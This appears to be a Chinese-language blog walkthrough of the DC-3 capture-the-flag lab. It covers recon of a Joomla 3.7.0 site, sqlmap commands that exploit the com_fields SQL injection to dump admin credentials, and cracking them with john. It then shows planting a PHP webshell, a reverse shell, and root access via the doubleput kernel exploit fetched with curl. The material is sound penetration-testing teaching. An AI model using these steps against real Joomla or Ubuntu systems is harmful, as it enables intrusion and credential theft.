DC-3是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag,基于joomla漏洞。


环境搭建

攻击机kali2021,网络环境NAT

信息收集


主机发现

arp-scan -l

端口探测

nmap
目标靶机只开放了80端口,基于joomla的CMS网站

访问web

web

扫描网站目录

dirb
后台地址为http://192.168.207.143/administrator/

漏洞扫描

joomscan --url http://192.168.207.143  
#joomscan是一款针对joomla的漏洞扫描工具

joomscan
发现joomla版本是3.7.0
在kali中搜索有无相关漏洞
searchsploit
3.7.0版本存在SQL注入,查看漏洞描述

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

漏洞描述
确定注入点

http://[ip addr]/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml

sqlmap注入

sqlmap进行自动化注入,查看当前库

sqlmap -u "http://192.168.207.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

databases
查看joomladb库下的所有表

sqlmap -u "http://192.168.207.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

tables
查看users表内容

sqlmap -u "http://192.168.207.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

__users
查看username、password字段的值

sqlmap -u "http://192.168.207.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "username,password" --dump -p list[fullordering]

user/pass

解密密码

john

Web渗透


后台登陆

使用获取的用户名和密码尝试登陆后台
登录成功

写入一句话木马

直接在主页写入一句话木马
一句话木马

蚁剑连接

蚁剑

反弹shell

使用蚁剑反弹shell
蚁剑
kali

提权


查看系统版本
16.04
这个版本的Ubuntu有内核漏洞

查找漏洞

查找Ubuntu 16.04存在的漏洞
查找漏洞
可以使用39772的漏洞提权

(Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation            | linux/local/39772.txt

漏洞利用

在kali下载漏洞执行文件
39772
将漏洞文件解压,放在kali-apache目录下
apache2
在靶机shell下使用curl将文件下载
curl

执行文件

./compile.sh
./doubleput #执行compile.sh会生成该文件

thefllag

总结


1.网站的CMS是Joomla,其登陆后可以修改模板,写入php-reverse-shell.php的内容,反弹shell;
2.Joomal3.7.0存在着一个sql注入漏洞,存在于kali的42033.txt内,可以提示我门使用sqlmap获取网站后台admin用户的密码(内附payload);
3.John --show ./hash(**hash加密密文);
4.joomscam专门用来扫描joomla的站点;

最后修改:2021 年 08 月 12 日 10 : 47 PM
如果觉得我的文章对你有用,请随意赞赏